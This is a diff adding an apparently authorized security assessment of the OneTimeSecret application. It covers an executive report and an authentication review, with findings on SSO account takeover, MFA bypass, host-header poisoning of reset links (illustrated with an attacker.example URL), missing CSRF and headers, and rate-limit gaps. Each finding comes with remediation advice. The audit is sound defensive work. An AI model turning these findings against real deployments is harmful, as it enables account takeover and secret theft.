+  `request.base_url`; OTS never overrides Rodauth `base_url`, and `DetectHost`/`DomainStrategy` don't
+  reject untrusted Host values — so single-use tokens can be delivered to an attacker-chosen domain.
+  Evidence: `apps/web/auth/config/email/reset_password.rb:14-15`; `lib/middleware/detect_host.rb:156-194`;
+  `lib/onetime/middleware/domain_strategy.rb:104-149`. *(01, 04 F3)*
+  **Applicability:** auth (password reset / email auth) enabled.
+
+- **[A4] SSO domain allowlist enforced only on account-creation, not on the linking path.**
+  `apps/web/auth/config/hooks/omniauth.rb:133-180` vs fork `omniauth.rb:79-87`. Compounds A1. *(01)*
+
+- **[P1] CSRF protection bypassed for cookie-authenticated API mutations.** The entire `/api/` prefix
+  is blanket-exempted from token CSRF, yet many `/api/*` POST/PATCH endpoints accept `auth=sessionauth`
+  (cookie) — account deletion, password/API-token change, secret creation. The only fallback
+  (`HttpOrigin`) is off by default.
+  Evidence: `lib/onetime/middleware/security.rb:142`. *(04 #2)*
+  **Applicability:** any logged-in (cookie) session using API-backed actions.
+
+- **[S1] CSP disabled by default.** `CSP_ENABLED` defaults false; the policy is only emitted when
+  enabled (the policy itself, when on, is strong: nonce-based, no `unsafe-inline`).
+  Evidence (live-confirmed, header ABSENT on `/api/v2/status`, `../evidence/headers_output.txt`):
+  `etc/defaults/config.defaults.yaml:351-353`; `apps/api/v1/controllers/helpers.rb:171-208`. *(05)*
+
+- **[S2] Clickjacking / HSTS / security headers off by default.** `frame_options`, `strict_transport`,
+  `http_origin`, `xss_header` all default false; with CSP also off, a default install ships **neither**
+  X-Frame-Options nor `frame-ancestors` → framable/clickjackable, and no HSTS.
+  Evidence (live-confirmed ABSENT): `etc/defaults/config.defaults.yaml:314-338`;
+  `lib/onetime/middleware/security.rb:76`. *(05, 04 #1)*
+
+- **[D1] `oauth2` 2.0.18 — bearer-token leak (GHSA-pp92-crg2-gfv9).** A protocol-relative redirect can
+  leak the `Authorization` header to an attacker host; reachable via the OmniAuth/OIDC login path.
+  Fix: bump to `>= 2.0.22` (allowed by the existing constraint). Evidence: `Gemfile.lock:265`. *(06 #1)*
+  **Applicability:** SSO/OIDC enabled.
+
+### MEDIUM (defense-in-depth / feature-gated)
+
+- **[C2]** Encryption HKDF salt & BLAKE2b personalization left at the shared library default
+  `'FamilialMatters'` — no per-deployment domain separation (bounded: master key still
+  deployment-unique). `lib/onetime/initializers/configure_familia.rb:57-72`; `familia/lib/familia/settings.rb:15-16`. *(03 F2)*
+- **[C3]** V1 reveal path has **no passphrase rate limiting** (V2 has it) → online passphrase
+  brute-force if V1 is routable. `apps/api/v1/logic/secrets/show_secret.rb:26-31`. *(03 F3)*
+- **[P2]** `Rack::DetectHost` trusts forwarded Host from any private/loopback peer (its own `private_ip?`),
+  not otto 2.3.1 trusted-proxy config → host-header injection from internal/SSRF vantage. `lib/middleware/detect_host.rb:156-165`. *(04 #3)*
+- **[P3]** Rate-limiting gaps: no app-layer limiting on auth/login or V2/V3 secret creation; V1 limiter
+  is fail-open and exempts authenticated users. `apps/api/v1/controllers/base.rb:145-171`. *(04 #4)*
+- **[AZ1]** `RemoveMember` is the only member-mgmt endpoint not using `require_entitlement_in!('manage_members')`
+  (relies on raw role-string checks). `apps/api/organizations/logic/members/remove_member.rb:39-58`. *(02 F1)*
+- **[AZ2]** Organization `safe_dump` leaks internal `objid`/owner custid/billing+contact emails to any
+  active member. `lib/onetime/models/organization/features/safe_dump_fields.rb:17-29`. *(02 F2)*
+- **[AZ3]** `Organization.create!` open `**` splat → `planid`/`is_default`/Stripe/`complimentary`
+  mass-assignable if any caller forwards user params (safe today; sole caller passes fixed args). *(02 F3, NEEDS-VALIDATION)*
+- **[AZ4]** `change_role!` rejects `colonel` but not `owner`; owner-escalation guard lives only in one
+  endpoint validator, not the model. `lib/onetime/models/organization_membership.rb:258-274`. *(02 F4, NEEDS-VALIDATION)*
+- **[AZ5]** Organization external id uses plain SHA-256 (no keyed HMAC), compounded by AZ2 leaking objid.
+  `lib/onetime/models/organization.rb:46`. *(02 F5, NEEDS-VALIDATION)*
+- **[A5]** Recovery codes stored in plaintext. `rodauth/lib/rodauth/features/recovery_codes.rb`. *(01)*
+- **[A6]** WebAuthn RP-ID/origin derived from `request.host` (ties to host-header trust). `features/webauthn.rb:14-22`. *(01)*
+- **[A7]** Password-reset enumeration (distinct 401/403/200); no max password length → Argon2 CPU DoS.
+  `features/account_management.rb:104`. *(01)*
+- **[A8]** 1-day per-account lockout enables targeted lockout DoS. `features/lockout.rb:15`. *(01)*
+- **[D2]** `form-data` 4.0.5 via `axios` (GHSA-hmw2-7cc7-3qxx) — only prod-tree JS CVE; mitigated
+  (browser bundle doesn't use the Node helper). Bump axios / override `>= 4.0.6`. `pnpm-lock.yaml:3129`. *(06 #2)*
+- **[D3]** Production source maps emitted (`sourcemap: true`) and copied into the image / served at
+  `/dist`; use `'hidden'` or strip. `vite.config.ts:283`. *(06 #3, 05)*
+- **[D4]** Internet-facing Caddy proxy image runs as **root**, base not digest-pinned, apt without
+  `--no-install-recommends`. `docker/variants/caddy.dockerfile:85`. *(06 #4)*
+- **[D5]** `docker-compose.simple.yml` runs Valkey `--bind 0.0.0.0` with **no `requirepass`/ACL** and
+  **publishes 6379 to the host**; full stack defaults RabbitMQ to `guest:guest`.
+  `docker/compose/docker-compose.simple.yml:57-69`, `docker-compose.full.yml:129-130`. *(06 #5)*
+- **[S3]** Revealed plaintext not cleared from SPA memory (`clear()`/`$reset()` exist but unused on the
+  reveal flow). `src/shared/stores/secretStore.ts:203-216`. *(05)*
+- **[C4]** Passphrase rate-limit gate-read and failure-record are separate round-trips → bounded
+  >5-attempt overshoot under concurrency; test Argon2 cost selected by `RACK_ENV=test`. *(03 F4)*
+
+### LOW / INFO
+
+- **[C5]** No app-level cap on secret payload size (Redis memory DoS). `apps/api/v2/logic/secrets/conceal_secret.rb`. *(03 F5)*
+- **[C6/D6]** Legacy v1 encryption key = unsalted `Base64(SHA256(secret))` (read-compat only; v2=HKDF). `configure_familia.rb:65`. *(03 F6, 06)*
+- **[AZ6]** Receipt `safe_dump` exposes creator `owner_id` via anonymous receipt/burn endpoints. *(02 F6)*
+- **[AZ7]** `show_invite` (noauth) discloses inviter email + an account-exists oracle. `apps/api/invite/logic/base.rb:51-64`. *(02 F7)*
+- **[AZ8]** `Customer.create!` has no allowlist (`role`/`verified` mass-assignable at model layer; safe
+  because all signup paths hardcode `'customer'`). *(02 F8)*
+- **[AZ9]** No in-logic rate limit on anonymous incoming `/secret` (each emails a recipient). *(02 F9)*
+- **[P4]** V1 Basic-Auth username enumeration via timing (no dummy-hash, unlike V2/V3). `apps/api/v1/controllers/base.rb:68-71`. *(04 #5)*
+- **[P5]** Log injection of attacker-controlled Basic-Auth username. `apps/api/v1/controllers/base.rb:67`. *(04 #6)*
+- **[S4]** `v-html` in `GlobalBroadcast.vue` (DOMPurify-sanitized to `<a>` only; operator-set content). *(05)*
+- **[S5]** DNS widget injects a same-origin script without a nonce (would break under strict CSP). *(05)*
+- **[OBS1]** `SessionDebugger` can dump full response headers incl. `Set-Cookie` when `DEBUG_SESSION` set (gated/off by default). `lib/middleware/session_debugger.rb:102`. *(06)*
+
+---
+
+## 4. Strong controls verified (no action required)
+
+- **Token unpredictability:** secret/receipt ids = 256-bit `SecureRandom` + 64-bit HMAC tag; HMAC
+  secret has no committed default (fails closed). `familia/lib/familia/{secure_identifier,verifiable_identifier}.rb`.
+- **Encryption at rest:** AES-256-GCM / XChaCha20-Poly1305 AEAD, fresh CSPRNG nonce per message,
+  HKDF/BLAKE2b derivation, **AAD + key context bound to `Class:field:identifier`** (ciphertext can't be
+  moved between records). `familia/lib/familia/features/encrypted_fields/encrypted_field_type.rb:183-220`.
+- **Passphrases:** Argon2id with library constant-time verify; bcrypt only for legacy reads.
+- **No insecure default secret** — app fails closed without `SECRET`; secrets are `SecureRandom.hex(64)` + HKDF.
+- **Lua/Redis:** all scripts use bound `KEYS`/`ARGV` (no injection); identifiers pass a strict
+  `[^a-zA-Z0-9_-]` allowlist before becoming keys.
+- **Session store:** AES-256-GCM + HMAC over Redis, HKDF subkeys, constant-time HMAC compare, session
+  id regenerated on login (fixation mitigated), `awaiting_mfa` not treated as authenticated, TOTP replay prevented.
+- **otto framework:** trusted-proxy/client-IP resolution well-designed; dynamic `send` dispatch
+  allowlisted via `ConstantResolver`; static-file path traversal blocked; **no CORS shipped**; generic
+  prod errors with correlation IDs.
+- **Authorization core:** entitlement-based; colonel (admin) is a server-side, verified-email-gated role
+  enforced at the edge and in all logic actions; no config auto-promotion; no production raw-params sinks.
+- **SPA secret handling:** revealed secret rendered as **text** (not HTML), never in the URL, never in
+  persistent storage; CSRF token in-memory only; session cookie HttpOnly; robust open-redirect validator.
+- **Fork notes:** `rodauth-omniauth` is unmodified upstream v0.6.2; the `rodauth` fork carries upstream
+  maintenance — all SSO risk is in OTS's own config overrides (A1/A2/A4).
+
+---
+
+## 5. Top remediation priorities
+
+1. **[C1]** Make secret reveal/burn an **atomic single-winner consume** (Lua check-and-`DEL`-returning-
+   ciphertext, or `WATCH`+`MULTI/EXEC` on the secret key, or `Familia::Lock`). The codebase already uses
+   these primitives for org/domain creation — apply them to the crown-jewel path. Decrypt only after the
+   atomic claim succeeds.
+2. **[A1/A2/A4]** For SSO: require a verified-email claim (or out-of-band verification) before linking an
+   SSO identity to an existing account; enforce the domain allowlist on the linking path; do not bypass
+   MFA for `via_omniauth`.
+3. **[S1/S2]** Ship CSP, `X-Frame-Options`/`frame-ancestors`, and HSTS **on by default**.
+4. **[P1]** Apply CSRF protection (or strict same-origin/SameSite) to cookie-authenticated `/api/*` mutations.
+5. **[D1]** Bump `oauth2 >= 2.0.22`.
+6. **[A3/P2]** Pin Rodauth `base_url`/email host to a configured canonical host; align `DetectHost` with
+   otto's trusted-proxy config.
+7. **[D5]** Default Redis/Valkey to `requirepass`/ACL and not host-exposed; replace RabbitMQ `guest:guest`.
+
+---
+
+## 6. Caveats on scope of impact
+
+- The default deployment has **authentication and SSO disabled** and **diagnostics off**, so A1/A2/A4/A6/A7/A8
+  and D1 require those features to be enabled to be exploitable. They are nonetheless serious for the
+  (common) hosted/enterprise configurations that enable accounts + SSO.
+- C1 (one-time race), S1/S2 (headers), and C5 apply to the **default** configuration.
+- Items marked NEEDS-VALIDATION (AZ3/AZ4/AZ5) are reachable model-layer weaknesses with no confirmed
+  production sink today; they are pre-emptive hardening.

--- a/docs/security/assessment-2026-06-22/findings/00-EXECUTIVE-REPORT.md
+++ b/docs/security/assessment-2026-06-22/findings/00-EXECUTIVE-REPORT.md
@@ -106,7 +106,7 @@ precondition. IDs map to the per-area files.
   `familia/lib/familia/horreum/persistence.rb:558` + `database_commands.rb:252,242`.
   **Live PoC:** `../poc/race_reveal_model.rb` (deterministic 10/10) and multi-process workers
   (`../poc/_reveal_worker.rb`) → **12/12 independent processes obtained the same secret's plaintext**
-  (`../evidence/race_poc_output.txt`). *(Detail: 03 F1)*
+  (`../evidence/race_poc_output.md`). *(Detail: 03 F1)*
   **Applicability:** default config (anonymous sharing); impact = single-use/tamper-evidence broken.
 
 - **[A2] SSO bypasses MFA unconditionally.** `via_omniauth: true` short-circuits the MFA requirement
@@ -133,7 +133,7 @@ precondition. IDs map to the per-area files.
 
 - **[S1] CSP disabled by default.** `CSP_ENABLED` defaults false; the policy is only emitted when
   enabled (the policy itself, when on, is strong: nonce-based, no `unsafe-inline`).
-  Evidence (live-confirmed, header ABSENT on `/api/v2/status`, `../evidence/headers_output.txt`):
+  Evidence (live-confirmed, header ABSENT on `/api/v2/status`, `../evidence/headers_output.md`):
   `etc/defaults/config.defaults.yaml:351-353`; `apps/api/v1/controllers/helpers.rb:171-208`. *(05)*
 
 - **[S2] Clickjacking / HSTS / security headers off by default.** `frame_options`, `strict_transport`,

--- a/docs/security/assessment-2026-06-22/findings/01-authn-session.md
+++ b/docs/security/assessment-2026-06-22/findings/01-authn-session.md
@@ -1,0 +1,365 @@
+# Authentication & Session Management — Security Assessment
+
+**Target:** OneTimeSecret (main app + `otto`, `familia`, fork of `rodauth`, fork of `rodauth-omniauth`)
+**Branch:** `claude/vigilant-goldberg-97ijfl`
+**Scope:** Authentication & session management (Rodauth config, magic-link/email-auth, SSO/OIDC, WebAuthn, TOTP/MFA, session lifecycle, lockout/reset/enumeration)
+**Assessment type:** Authorized defensive source review + local reasoning. Synthetic data only. READ-ONLY on tracked sources.
+**Date:** 2026-06-22
+
+Severity legend: Critical / High / Medium / Low / Info. Status: **CONFIRMED** (verified in code) vs **NEEDS-VALIDATION** (mechanism confirmed; exploitability depends on runtime/deploy config).
+
+---
+
+## Executive Summary
+
+The auth stack is generally thoughtfully built: Rodauth tokens use 256-bit entropy with HMAC-at-rest and constant-time comparison; the partial-MFA session state is correctly gated by the main app; account creation and email-auth/verify-resend flows are hardened against enumeration; and the multi-tenant SSO credential-injection path has solid cross-tenant guards. However, several high-impact issues exist, concentrated in SSO and email-link generation.
+
+### Top findings
+
+| # | Finding | Severity | Status |
+|---|---------|----------|--------|
+| 1 | SSO identity auto-links to existing local account by email; no `email_verified` check → account takeover | **Critical** | CONFIRMED |
+| 2 | SSO logins unconditionally bypass MFA (`via_omniauth: true`) | **High** | CONFIRMED |
+| 3 | Host-header poisoning of reset/magic/verify email links → token theft / ATO | **High** | CONFIRMED |
+| 4 | SSO domain/allowlist restriction not applied on the account-*linking* path | **High** | CONFIRMED |
+| 5 | Recovery codes stored in plaintext in SQL | **Medium** | CONFIRMED |
+| 6 | WebAuthn RP-ID & origin derived from attacker-controllable Host header | **Medium** | NEEDS-VALIDATION |
+| 7 | Password-reset request leaks account existence/state (401/403/200) | **Medium** | CONFIRMED |
+| 8 | No maximum password length → argon2 CPU/memory DoS | **Medium** | CONFIRMED |
+| 9 | Per-account lockout (5 fails, ~1-day default) → targeted victim DoS | **Medium** | CONFIRMED |
+| 10 | SSO default config applies NO domain restriction (default-allow) | **Medium** | CONFIRMED |
+| 11 | OIDC id_token nonce can be overridden by callback param | **Medium** | NEEDS-VALIDATION |
+| 12 | Email-token DB hashing depends on `AUTH_SECRET`; raw-token fallback if unset | **Medium** | NEEDS-VALIDATION |
+| 13 | Recovery codes only 64-bit entropy; only 4 issued | **Low** | CONFIRMED |
+| 14 | No breach/common-password/complexity checks (features exist, unused) | **Low** | CONFIRMED |
+| 15 | Login timing oracle (argon2 only runs for existing accounts) | **Low** | NEEDS-VALIDATION |
+| 16 | WebAuthn UV `preferred` (not enforced), incl. passwordless login | **Low** | CONFIRMED |
+| 17 | Stateless WebAuthn challenge, no single-use ledger | **Low** | CONFIRMED |
+| 18 | Tenant-controlled OIDC issuer/discovery (per-domain SSO) | **Low/Medium** | NEEDS-VALIDATION |
+| 19 | `IdentityResolution.full_authenticated?` omits `authenticated==true` check | **Info** | CONFIRMED (dead path) |
+
+### Positive controls observed
+- Session ID is regenerated on login (Rodauth `update_session` → `clear_session` → `session.destroy` → new sid), mitigating fixation.
+- Session data is AES-256-GCM encrypted + HMAC-signed at rest in Redis (`lib/onetime/session.rb`), keys derived via HKDF (`lib/onetime/key_derivation.rb`).
+- The partial-auth (`awaiting_mfa`) state is correctly NOT treated as authenticated by the app's real gate.
+- Account creation, email-auth request, and verify-account resend are enumeration-safe.
+- TOTP replay within the time-step is prevented; OTP keys HMAC-wrapped; multi-tenant SSO has cross-tenant mismatch/strategy validation.
+
+---
+
+## 1. CRITICAL — SSO identity auto-links to an existing local account by email, with no IdP email-verification check
+
+**Status:** CONFIRMED (behavior). Real-world exploitability depends on a deployment trusting an IdP whose asserted email the attacker can control.
+
+**Evidence:**
+- `apps/web/auth/config/hooks/omniauth.rb:27-30` — `account_from_omniauth` resolves an **existing** account purely by normalized email:
+  ```ruby
+  auth.account_from_omniauth do
+    normalized_email = OT::Utils.normalize_email(omniauth_email)
+    _account_from_login(normalized_email)
+  end
+  ```
+- `rodauth-omniauth` fork `lib/rodauth/features/omniauth.rb:58-99` — callback links the SSO identity to whatever account that returns, then `login("omniauth")`. No email-ownership proof.
+- `apps/web/auth/config/features/omniauth.rb:38-40` — `auth.omniauth_verify_account? true` overrides the upstream guard (`account[login_column] == omniauth_email`, fork `omniauth.rb:151-153`), so even an unverified pre-existing account is force-verified and logged into.
+- `rodauth-omniauth` `lib/rodauth/omniauth_base.rb` — `omniauth_email` is just `auth_hash.info.email`; **no `email_verified` claim is ever read** anywhere in OTS production code (verified by grep — appears only in spec fixtures). The OIDC strategy exposes `info.email_verified` but OTS never consults it.
+
+**Impact:** An attacker who can cause any trusted/enabled IdP to assert `email == victim@domain` (e.g., a self-service or attacker-administered tenant IdP, or a provider that returns unverified emails) is logged in as the victim into the victim's pre-existing password-protected account — bypassing the password and (combined with Finding 2) the victim's MFA. Classic SSO-merge / pre-hijack account takeover.
+
+**Remediation:**
+1. Read and require the IdP `email_verified` claim before trusting the email for link/create.
+2. Do not silently auto-link an SSO identity to an account that already has its own credentials (password/email-auth/WebAuthn). Require an explicit linking confirmation (login or emailed link).
+3. Replace `omniauth_verify_account? true` with a predicate that re-asserts the upstream `account[login_column] == omniauth_email` guard AND `email_verified`.
+
+---
+
+## 2. HIGH — SSO logins unconditionally bypass MFA
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- `apps/web/auth/config/hooks/login.rb:128-133` — `after_login` passes `via_omniauth: true` for SSO.
+- `apps/web/auth/operations/detect_mfa_requirement.rb:151-156` — `mfa_required?` returns `false` immediately when `@via_omniauth` is true, *before* any policy override:
+  ```ruby
+  return false if @via_omniauth
+  return true if @mfa_policy == :required
+  ```
+
+**Impact:** An account that has TOTP/recovery configured is logged in with a full session via SSO **without** a second factor. Combined with Finding 1, an attacker who takes over the SSO email-match path also skips the victim's MFA entirely. Even on its own, this means MFA is not enforced for SSO users — an explicit project decision ("the IdP is trusted"), but it silently overrides an account-level `:required` MFA policy.
+
+**Remediation:** At minimum, honor an account-level `mfa_policy == :required` even for SSO (do not let `via_omniauth` short-circuit a hard requirement). Document the SSO-skips-MFA behavior prominently; consider requiring the IdP to assert an MFA/`amr` claim before treating SSO as two-factor-equivalent.
+
+---
+
+## 3. HIGH — Host-header poisoning of password-reset / magic-link / verify-account email links
+
+**Status:** CONFIRMED (mechanism + absence of edge enforcement in app code). Net exploitability depends on whether the production edge proxy strictly pins `Host`.
+
+**Evidence:**
+- Email link bodies use `request.base_url` directly:
+  - `apps/web/auth/config/email/reset_password.rb:14-15` (`reset_password_path: reset_password_email_link`, `baseuri: request.base_url`)
+  - `apps/web/auth/config/email/email_auth.rb:20`
+  - `apps/web/auth/config/email/verify_account.rb:15`
+- Rodauth builds the token link host from the request: fork `rodauth/lib/rodauth/features/email_base.rb:53-55` → `base.rb` `domain`/`base_url` derive from `request.host` (the inbound `Host` header). OTS does **not** override `auth.domain`/`auth.base_url` (verified by grep over `apps/web/auth/config`).
+- `Rack::DetectHost` only writes `env['rack.detected_host']` (`lib/middleware/detect_host.rb:192`); it does **not** rewrite `HTTP_HOST` or reject bad hosts.
+- `Onetime::Middleware::DomainStrategy#call` (`lib/onetime/middleware/domain_strategy.rb:104-149`) classifies a bad host as `:invalid` but still calls `@app.call(env)` (line 146) — it does not halt untrusted hosts.
+
+**Impact:** If an attacker can set the `Host` header on the request that triggers a reset/magic-link email for a victim, the victim receives a legitimate email whose link points to `https://attacker.example/reset-password?key=<account_id>_<valid_key>`. Clicking it delivers the valid single-use token to the attacker → password reset / passwordless login → account takeover.
+
+**Remediation:** Override Rodauth `domain`/`base_url` (and the template `baseuri`) to a configured canonical site host (e.g. `OT.conf['site']['host']` / `DomainStrategy.canonical_domain`), or strictly validate/reject non-allowlisted `Host` at the edge AND in `DomainStrategy` (halt on `:invalid`). Do not derive email-link hosts from `request.host`.
+
+---
+
+## 4. HIGH — SSO domain/allowlist restriction not applied to the account-linking path
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- Domain validation lives only in `before_omniauth_create_account` (`apps/web/auth/config/hooks/omniauth.rb:133-180`).
+- Fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb:79-87` runs `omniauth_create_account` (and thus `before_omniauth_create_account`) **only when no account was found**. When `account_from_omniauth` matches an existing account by email, creation — and the entire domain check — is skipped.
+
+**Impact:** Allowed-domain / per-domain SignupConfig restrictions are bypassable for any email that already has an OTS account. An out-of-policy IdP identity can still authenticate into a pre-existing account regardless of the configured domain allowlist (amplifies Finding 1).
+
+**Remediation:** Apply the domain/policy validation on the linking path too (e.g., in `before_omniauth_callback_route` or inside `account_from_omniauth`), not only on creation.
+
+---
+
+## 5. MEDIUM — Recovery codes stored in plaintext in SQL
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- Rodauth `recovery_codes` feature stores `new_recovery_code` verbatim (`rodauth/lib/rodauth/features/recovery_codes.rb:~189-196` insert) and reads it back with `select_map(recovery_codes_column)` (~263), comparing via `timing_safe_eql?` against the raw stored value. No HMAC/hash is applied (unlike password hashes and HMAC-wrapped OTP keys).
+- OTS overrides only the generator (`apps/web/auth/config/features/mfa.rb:74-76`), not storage.
+
+**Impact:** Recovery codes are full MFA-bypass credentials sitting in cleartext in the auth DB. DB read access (compromise, backup leak, SQLi, broad console access) yields working second-factor bypass codes.
+
+**Remediation:** Store a keyed hash/HMAC of recovery codes (verify whether this Rodauth version honors `hmac_secret` for recovery codes; if not, override `add_recovery_code`/`recovery_code_match?` to HMAC before store/compare). Enforce DB-at-rest encryption and tight access on `account_recovery_codes` + backups.
+
+---
+
+## 6. MEDIUM (NEEDS-VALIDATION) — WebAuthn RP-ID and origin derived from attacker-controllable Host header
+
+**Status:** Mechanism CONFIRMED; impact depends on edge `Host` enforcement.
+
+**Evidence:**
+- `apps/web/auth/config/features/webauthn.rb:14-22` — `webauthn_rp_id { request.host }` and `webauthn_origin { "#{request.scheme}://#{request.host_with_port}" }`.
+- Both the expected RP-ID and the expected origin track the same request host, so a mismatched/attacker host does not fail verification — the "expected" values simply move to match. The codebase already computes a validated canonical host (`env['onetime.display_domain']`) but WebAuthn does not use it.
+
+**Impact:** Weakens WebAuthn's anti-phishing origin pinning to "origin must equal whatever host this request claims." If any unvalidated host reaches the app (see Finding 3 — edge does not pin), a credential registered for host A could be asserted against host B and ceremonies run under an attacker-chosen RP-ID. (Assertion replay is still blocked by `sign_count`.)
+
+**Remediation:** Pin `webauthn_rp_id` to the configured canonical domain; validate `request.host`/origin against an allowlist (reuse `env['onetime.display_domain']`). For custom-domain support use an explicit per-domain RP-ID map.
+
+---
+
+## 7. MEDIUM — Password-reset request leaks account existence/state
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- Rodauth `reset_password` (`rodauth/lib/rodauth/features/reset_password.rb:74-94`): nonexistent login → `:no_matching_login` → **401** "no matching login"; existing → **200** "email sent"; existing-but-unverified → **403** "unverified" (`:178-180`).
+- OTS overrides `email_auth_request_error_flash` but NOT `reset_password_request_error_flash`/`no_matching_login_message`, and does not force a uniform 200 (verified by grep). With `only_json? true`, the attacker reads status/message and distinguishes nonexistent (401) vs unverified (403) vs valid (200).
+
+**Impact:** Email/account enumeration plus account-state disclosure via the public reset endpoint. (Note: account creation, email-auth request, and verify-resend are enumeration-safe — see positives.)
+
+**Remediation:** Make the reset-request response uniform (always 200 + generic "if an account exists, an email was sent"), mirroring the generic treatment already applied to create-account/email-auth.
+
+---
+
+## 8. MEDIUM — No maximum password length → argon2 resource-exhaustion DoS
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- `apps/web/auth/config/features/account_management.rb:104` sets `password_minimum_length 8` but **no** `password_maximum_length`/`password_maximum_bytes` exists anywhere (grep). Rodauth defaults are `nil`.
+- The raw password is fed to `::Argon2::Password...create(password)` (`apps/web/auth/config/features/argon2.rb`) on every signup/reset/change, with production cost `t_cost=2, m_cost=16` (64 MiB). Argon2 has no inherent input truncation (unlike bcrypt's 72 bytes).
+
+**Impact:** Multi-megabyte passwords multiply CPU/memory per hash; repeated large-password POSTs to signup/reset are a cheap DoS, amplified by synchronous email `fallback: :sync` (`config/email/delivery.rb:38`).
+
+**Remediation:** Set `auth.password_maximum_bytes` (e.g., 256–1024).
+
+---
+
+## 9. MEDIUM — Per-account lockout enables targeted victim DoS
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- `apps/web/auth/config/features/lockout.rb:15` — `max_invalid_logins 5`; the `lockout_expiration_default` override is commented out (`:16`), so the Rodauth default `account_lockouts_deadline_interval {:days=>1}` (~1 day) applies.
+- Rodauth lockout is keyed on `account_id` and blocks `before_login_attempt` once locked.
+
+**Impact:** Knowing a victim's email, an attacker submits 5 bad passwords to lock that account for ~1 day. Self-service unlock exists via the unlock-account email flow, but still forces a victim email round-trip. (Passwordless paths — magic link / SSO — and reset are not gated by lockout, which is generally desirable but means lockout doesn't stop a factor-pivoting attacker.)
+
+**Remediation:** Shorten the lockout window (e.g., 15–60 min with backoff), and/or add IP-based throttling and CAPTCHA so a single account isn't trivially DoS-able by a remote actor.
+
+---
+
+## 10. MEDIUM — SSO default configuration applies NO domain restriction
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- `lib/onetime/config.rb` — `allowed_signup_domains` defaults to `[]`; `Onetime::SignupValidation.global_allowed_domains?` returns `true` (allow-all) for an empty list (`lib/onetime/signup_validation.rb`).
+- `apps/web/auth/config/features/omniauth.rb:42-47` — `omniauth_create_account? true`.
+- Normalization mismatch: lookup uses full `normalize_email` (NFC + `:fold`) at `hooks/omniauth.rb:28`, but the domain-policy check uses `.strip.downcase` (`hooks/omniauth.rb:134`, `signup_validation.rb`). Unicode/fold-equivalent emails can diverge between policy and match.
+
+**Impact:** Default posture is open auto-provisioning for any user of a trusted IdP. Operators relying on SSO to restrict to their org are unprotected unless they explicitly configure allowlists. The normalization mismatch is a potential allowlist-bypass vector (NEEDS-VALIDATION as an independent exploit).
+
+**Remediation:** Ship a safer default (require an allowlist when SSO + auto-create are enabled); use the same `normalize_email` for both policy checks and account lookup.
+
+---
+
+## 11. MEDIUM (NEEDS-VALIDATION) — OIDC id_token nonce can be overridden by callback param
+
+**Status:** NEEDS-VALIDATION (upstream `omniauth_openid_connect` behavior).
+
+**Evidence:**
+- `omniauth_openid_connect` strategy verifies id_token with `nonce: params['nonce'].presence || stored_nonce` — a callback-supplied `nonce` param overrides the session `stored_nonce`, weakening the session↔id_token nonce binding.
+
+**Impact:** Nonce replay protection can be neutralized by an attacker controlling callback params with a known-nonce id_token. In OTS's code+PKCE flow, OAuth `state` and PKCE still protect primary CSRF/code-injection, so this is defense-in-depth (Medium), not standalone takeover.
+
+**Remediation:** Pin/patch the OIDC strategy to verify id_token nonce strictly against `stored_nonce` (ignore `params['nonce']`), or upgrade if upstream is fixed.
+
+---
+
+## 12. MEDIUM (NEEDS-VALIDATION) — Email-token DB hashing depends on `AUTH_SECRET`; raw-token fallback if unset
+
+**Status:** NEEDS-VALIDATION (`rodauth-tools` `hmac_secret_guard` source not on disk).
+
+**Evidence:**
+- Tokens are HMAC-SHA256 in the DB **only if** `hmac_secret` is set. OTS sets it indirectly via `auth.hmac_secret_env_key 'AUTH_SECRET'` + `enable :hmac_secret_guard` (`apps/web/auth/config/base.rb:10-13`).
+- If `AUTH_SECRET` is unset/empty and `hmac_secret_guard` does not hard-fail boot, `hmac_secret` falls back to `nil` (rodauth `base.rb:44`), and `account_from_key` accepts a **raw** token compared against the raw stored key (fork `email_base.rb:74`, `(!hmac_secret || allow_raw_email_token?)` branch) — i.e., DB-readable tokens become directly usable.
+
+**Impact:** With no/empty `AUTH_SECRET`, magic-link/reset/verify tokens are stored in cleartext and a DB read yields usable login/reset tokens.
+
+**Remediation:** Confirm `hmac_secret_guard` raises on boot when `AUTH_SECRET` is missing; make a strong `AUTH_SECRET` mandatory in production via a boot assertion.
+
+---
+
+## 13. LOW — Recovery codes only 64-bit entropy; only 4 issued
+
+**Status:** CONFIRMED.
+
+**Evidence:**
+- `apps/web/auth/config/features/mfa.rb:74-76` — `new_recovery_code { Familia.generate_trace_id }`; `generate_trace_id` is a 64-bit CSPRNG value (`familia/lib/familia/secure_identifier.rb`), which Familia explicitly labels "NOT safe for security contexts." Only 4 codes (`RECOVERY_CODES_LIMIT = 4`, `mfa.rb:14`).
+
+**Impact:** 2^64 keyspace per code, below the typical 128-bit recommendation. Mitigated by single-use deletion, account binding, and rate limiting — but confirm the recovery-auth endpoint (not just the OTP route, `OTP_AUTH_FAILURES_LIMIT = 7`) is itself lockout-protected; the `before_recovery_auth` hook only logs.
+
+**Remediation:** Use 128-bit codes; confirm recovery-auth is rate-limited/locked out.
+
+---
+
+## 14. LOW — No breach/common-password/complexity checks
+
+**Status:** CONFIRMED.
+
+**Evidence:** `apps/web/auth/config/features/password_requirements.rb` enables only `login_password_requirements_base`. The fork ships `disallow_common_passwords`, `password_complexity`, `disallow_password_reuse`, `password_pepper` — OTS enables none. No HaveIBeenPwned/k-anonymity check. 8-char minimum permits weak/breached passwords.
+
+**Remediation:** Enable `disallow_common_passwords` and/or a pwned-passwords integration.
+
+---
+
+## 15. LOW (NEEDS-VALIDATION) — Login timing oracle (argon2 only for existing accounts)
+
+**Status:** NEEDS-VALIDATION.
+
+**Evidence:** Rodauth `_account_from_login` short-circuits before password hashing for nonexistent logins, so a real account pays the argon2 cost (tens of ms) and a nonexistent one does not. No dummy-hash by default.
+
+**Impact:** Measurable timing oracle for account existence on the login endpoint.
+
+**Remediation:** Perform a constant-time dummy argon2 verify on the no-match path.
+
+---
+
+## 16. LOW — WebAuthn user verification `preferred` (not enforced), including passwordless login
+
+**Status:** CONFIRMED.
+
